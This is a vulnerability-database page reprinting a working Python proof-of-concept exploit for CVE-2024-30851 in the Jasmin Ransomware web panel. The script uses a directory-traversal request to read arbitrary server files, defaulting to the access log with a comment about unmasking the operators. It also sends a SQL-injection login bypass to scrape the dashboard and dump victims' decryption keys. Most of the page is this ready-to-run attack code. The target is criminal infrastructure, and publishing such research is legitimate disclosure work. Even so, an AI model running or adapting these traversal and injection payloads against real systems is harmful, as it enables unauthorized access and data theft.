Jasmin Ransomware 1.1 Arbitrary File Read

🗓️ 05 Apr 2024 00:00:00Reported by chebuyaType

packetstorm🔗 packetstormsecurity.com👁 347 Views

Jasmin Ransomware 1.1 Arbitrary File Read, Multiple SQL Injections, Authorization Bypas

Reporter	Title	Published	Views	Family All 15
GithubExploit	Exploit for CVE-2024-30851	4 Apr 202422:59	–	githubexploit
Circl	CVE-2024-30851	8 Apr 202415:48	–	circl
CNNVD	Jasmin The Ransomware 安全漏洞	3 May 202400:00	–	cnnvd
CVE	CVE-2024-30851	3 May 202400:00	–	cve
Cvelist	CVE-2024-30851	3 May 202400:00	–	cvelist
Metasploit	Jasmin Ransomware Web Server Unauthenticated Directory Traversal	27 May 202419:54	–	metasploit
Metasploit	Jasmin Ransomware Web Server Unauthenticated SQL Injection	27 May 202419:54	–	metasploit
NVD	CVE-2024-30851	3 May 202417:15	–	nvd
OSV	CVE-2024-30851	3 May 202417:15	–	osv
Packet Storm	Jasmin Ransomware Web Server Unauthenticated Directory Traversal	31 Aug 202400:00	–	packetstorm

`# Exploit Title: Jasmin Ransomware arbitrary file read  
# Date: 2024-04-04  
# Exploit Author: @_chebuya  
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware  
# Version: v1.1  
# Tested on: Ubuntu 20.04 LTS  
# CVE: CVE-2024-30851  
# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login  
# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main  
import requests  
import argparse  
import os  
from bs4 import BeautifulSoup  
  
def get_file(jasmin_url, filepath):  
response = requests.get(  
f'{jasmin_url}/download_file.php?file={filepath}',  
allow_redirects=False  
)  
  
return response.text  
  
  
def get_keys(jasmin_url):  
headers = {  
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',  
}  
  
data = "username=&password='+or+1%3D1+--+-&service=login"  
login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)  
cookies = login_req.cookies  
  
list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)  
soup = BeautifulSoup(list_req.text, 'html.parser')  
  
rows = soup.find_all('tr')  
  
print(f"Dumping decryption keys from {len(rows)-1} victims")  
for row in rows:  
data = row.find_all('td')  
if len(data) == 0:  
continue  
  
username = data[1].get_text()  
hostname = data[0].get_text()  
filepath = data[7].find('a')['href'].split("=")[1]  
  
print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")  
  
  
parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")  
subparser = parser.add_subparsers(dest='subcommand')  
  
file_parser = subparser.add_parser("getfile", help="Read a file off the server")  
file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")  
file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!  
  
keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")  
keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")  
  
args = parser.parse_args()  
  
if args.subcommand != None:  
target_url = args.url.rstrip("/")  
  
if args.subcommand == "getkeys":  
get_keys(target_url)  
elif args.subcommand == "getfile":  
target_file = args.file.replace("\\", "/").replace("c:", "")  
target_path = os.path.join("../../../../../../../../../", target_file)  
print(get_file(target_url, target_path))  
else:  
parser.print_help()  
`

05 Apr 2024 00:00Current

7.2High risk

Vulners AI Score7.2

EPSS0.75688